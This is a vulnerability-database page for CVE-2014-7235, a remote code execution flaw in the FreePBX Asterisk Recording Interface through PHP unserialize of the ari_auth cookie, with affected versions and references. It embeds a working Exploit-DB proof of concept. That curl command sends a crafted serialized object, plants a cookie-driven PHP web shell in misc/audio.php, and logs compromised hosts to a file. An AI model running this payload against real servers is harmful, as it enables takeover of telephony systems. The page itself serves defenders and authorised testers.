CVE-2014-7235
critical
CVSS v3
β
CVSS v4 NEW
β
VIR risk
10.0
Description
htdocs_ari/includes/login.php in the ARI Framework module/Asterisk Recording Interface (ARI) in FreePBX before 2.9.0.9, 2.10.x, and 2.11 before 2.11.1.5 allows remote attackers to execute arbitrary code via the ari_auth cookie, related to the PHP unserialize function, as exploited in the wild in September 2014.
Predictions
Exploit likelihood
20%
Patch ETA
β
Heuristic predictions, AS-IS, for prioritization only.
Mitigations
No mitigations published for this CVE yet.
The vendor-content worker queues fetches as references arrive (check back in a few minutes). Or β if you've already worked around this in production β publish your fix to the community-verified tier.
β Propose a mitigation on Community β Mitigations published via the community go through AI scoring + 2 human reviewers + 7-day silent objection window before landing here withsource_tier=community-verified.
Exploits
Public proof-of-concept code below. AS-IS, for defenders and authorised testing only.
Exploit-DB
Freepbx < 2.11.1.5 - Remote Code Execution
Exploit Title: Freepbx coockie recordings injection
Google Dork: Ask Santa
Date: 23/12/2016
Exploit Author: inj3ctor3
Vendor Homepage: https://www.freepbx.org/
Software Link: ISO LINKS IN SITE https://www.freepbx.org/
Version: ALL && unpatched/ (Trixbox/freepbx/elastix/pbxinflash/)
Tested on: Centos 6
CVE : CVE-2014-7235
1. Description
a critical Zero-Day Remote Code Execution and Privilege Escalation
exploit within the legacy βFreePBX ARI Framework module/Asterisk
Recording Interface (ARI)β.
htdocs_ari/includes/login.php in the ARI Framework module/Asterisk Recording Interface (ARI) in FreePBX before 2.9.0.9, 2.10.x,
and 2.11 before 2.11.1.5 allows remote attackers to execute arbitrary code via the ari_auth coockie,
related to the PHP unserialize function
<?php
.....
...
line 56 $buf = unserialize(stripslashes($_COOKIE['ari_auth']));
line 57 list($data,$chksum) = $buf;
....
?>
A successful attack may compromise the whole system aiding the hacker to gain
further privileges via taking advantage of famous nmap shell
without further or do this is a poc code
curl -ks -m20 http://127.0.0.1/recordings/index.php" --cookie "ari_lang=() { :;};php -r 'set_time_limit(0);unlink("page.framework.php");file_put_contents("misc/audio.php", "<?php if(\$_COOKIE[\"lang\"]) {system(\$_COOKIE[\"lang\"]);}die();?>");';ari_auth=O:8:"DB_mysql":6:{s:19:"_default_error_mode";i:16;s:22:"_default_error_options";s:9:"do_reload";s:12:"_error_class";s:4:"TEST";s:13:"was_connected";b:1;s:7:"options";s:3:"123";s:3:"dsn";a:4:{s:8:"hostspec";s:9:"localhost";s:8:"username";s:4:"root";s:8:"password";s:0:"";s:8:"database";s:7:"trigger";}};elastixSession=716ratk092555gl0b3gtvt8fo7;UICSESSION=rporp4c88hg63sipssop3kdmn2;ARI=b8e4h6vfg0jouquhkcblsouhk0" --data "username=admin&password=admin&submit=btnSubmit" >/dev/null
if curl -ks -m10 "http://127.0.0.1/recordings/misc/audio.php" --cookie "lang=id" | grep asterisk >/dev/null;then echo "127.0.0.1/recordings/misc/audio.php" | tee -a xploited_new.txt;fi
Application impact
| Vendor | Product | Versions | Fixed |
|---|---|---|---|
| freepbx | freepbx | 2.10.0.0 | |
| freepbx | freepbx | 2.10.0.1 | |
| freepbx | freepbx | 2.10.0.2 | |
| freepbx | freepbx | 2.10.0.3 | |
| freepbx | freepbx | 2.10.0.4 | |
| freepbx | freepbx | 2.10.0.5 | |
| freepbx | freepbx | 2.10.0.6 | |
| freepbx | freepbx | 2.10.0.7 | |
| freepbx | freepbx | 2.10.0.8 | |
| freepbx | freepbx | 2.10.0.9 | |
| freepbx | freepbx | 2.10.0.10 | |
| freepbx | freepbx | 2.11.1.0 | |
| freepbx | freepbx | 2.11.1.1 | |
| freepbx | freepbx | 2.11.1.2 | |
| freepbx | freepbx | 2.11.1.3 | |
| freepbx | freepbx | 2.11.1.4 | |
| sangoma | freepbx | {"endIncluding":"2.9.0.8"} | |
| sangoma | freepbx | 2.11.0.0 | |
| sangoma | freepbx | 2.11.0.1 | |
| sangoma | freepbx | 2.11.0.2 | |
| sangoma | freepbx | 2.11.0.3 | |
| sangoma | freepbx | 2.11.0.4 | |
References
- http://community.freepbx.org/t/critical-freepbx-rce-vulnerability-all-versions-cve-2014-7235/24536
- http://packetstormsecurity.com/files/128516/FreePBX-Authentication-Bypass-Account-Creation.html
- http://secunia.com/advisories/61601
- http://www.securityfocus.com/bid/70188
- https://exchange.xforce.ibmcloud.com/vulnerabilities/96790
- https://github.com/FreePBX/fw_ari/commit/f294b4580ce725ca3c5e692d86e63d40cef4d836
- https://www.exploit-db.com/exploits/41005/
- http://community.freepbx.org/t/critical-freepbx-rce-vulnerability-all-versions-cve-2014-7235/24536
- http://packetstormsecurity.com/files/128516/FreePBX-Authentication-Bypass-Account-Creation.html
- http://secunia.com/advisories/61601
- http://www.securityfocus.com/bid/70188
- https://exchange.xforce.ibmcloud.com/vulnerabilities/96790
- https://github.com/FreePBX/fw_ari/commit/f294b4580ce725ca3c5e692d86e63d40cef4d836
- https://www.exploit-db.com/exploits/41005/
CWEs
CWE-94
Community-verified mitigations for this CVE will appear above when contributors publish them.
Verify integrity in audit chain (admin only). AS-IS.